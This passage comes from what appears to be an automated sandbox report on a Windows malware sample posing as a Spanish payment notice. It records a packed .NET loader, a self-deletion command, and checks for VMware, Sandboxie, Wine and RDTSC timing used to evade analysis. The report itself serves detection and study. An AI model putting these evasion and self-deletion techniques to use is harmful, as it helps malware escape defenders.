          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Notificaci#U00f3n de pago.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Notificaci#U00f3n de pago.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Notificaci#U00f3n de pago.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: WWAHost.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb8A source: Notificaci#U00f3n de pago.exe
          Source: Binary string: WWAHost.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb source: Notificaci#U00f3n de pago.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: Notificaci#U00f3n de pago.exe, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/FJ.cs.Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: Notificaci#U00f3n de pago.exe, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/FJ.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_00B98EDF push ss; retf 0_2_00B98EF6
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A082 push 01F04D8Ch; iretd 8_2_0041A08B
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00416D1E push ds; retf 8_2_00416D1F
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00416DE0 push es; iretd 8_2_00416DE1
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D662 push eax; ret 8_2_0041D668
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D66B push eax; ret 8_2_0041D6D2
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D615 push eax; ret 8_2_0041D668
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041D6CC push eax; ret 8_2_0041D6D2
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041E773 push ecx; ret 8_2_0041E774
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00E18EDF push ss; retf 8_2_00E18EF6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039AD0D1 push ecx; ret 14_2_039AD0E4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A082 push 01F04D8Ch; iretd 14_2_00A7A08B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A76DE0 push es; iretd 14_2_00A76DE1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A76D1E push ds; retf 14_2_00A76D1F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D6CC push eax; ret 14_2_00A7D6D2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D615 push eax; ret 14_2_00A7D668
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D662 push eax; ret 14_2_00A7D668
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7D66B push eax; ret 14_2_00A7D6D2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7E773 push ecx; ret 14_2_00A7E774
          Source: initial sampleStatic PE information: section name: .text entropy: 7.92135270708
          Source: Notificaci#U00f3n de pago.exe, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Notificaci#U00f3n de pago.exe PID: 6360, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeRDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeRDTSC instruction interceptor: First address: 0000000000408F8E second address: 0000000000408F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000A68C04 second address: 0000000000A68C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000A68F8E second address: 0000000000A68F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe TID: 6364Thread sleep time: -45733s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe TID: 6448Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00408EC0 rdtsc 8_2_00408EC0
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI coverage: 9.4 %
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread delayed: delay time: 45733Jump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000000B.00000000.323171776.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.429366333.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 0000000B.00000000.340384303.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000B.00000000.435360812.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
          Source: explorer.exe, 0000000B.00000000.360151542.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 0000000B.00000000.323914419.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 0000000B.00000000.323171776.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00408EC0 rdtsc 8_2_00408EC0
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A25BA5 mov eax, dword ptr fs:[00000030h]14_2_03A25BA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398B390 mov eax, dword ptr fs:[00000030h]14_2_0398B390
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982397 mov eax, dword ptr fs:[00000030h]14_2_03982397
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03961B8F mov eax, dword ptr fs:[00000030h]14_2_03961B8F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03961B8F mov eax, dword ptr fs:[00000030h]14_2_03961B8F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0D380 mov ecx, dword ptr fs:[00000030h]14_2_03A0D380
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1138A mov eax, dword ptr fs:[00000030h]14_2_03A1138A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984BAD mov eax, dword ptr fs:[00000030h]14_2_03984BAD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984BAD mov eax, dword ptr fs:[00000030h]14_2_03984BAD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984BAD mov eax, dword ptr fs:[00000030h]14_2_03984BAD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D53CA mov eax, dword ptr fs:[00000030h]14_2_039D53CA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D53CA mov eax, dword ptr fs:[00000030h]14_2_039D53CA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]14_2_039803E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]14_2_039803E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]14_2_039803E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]14_2_039803E2
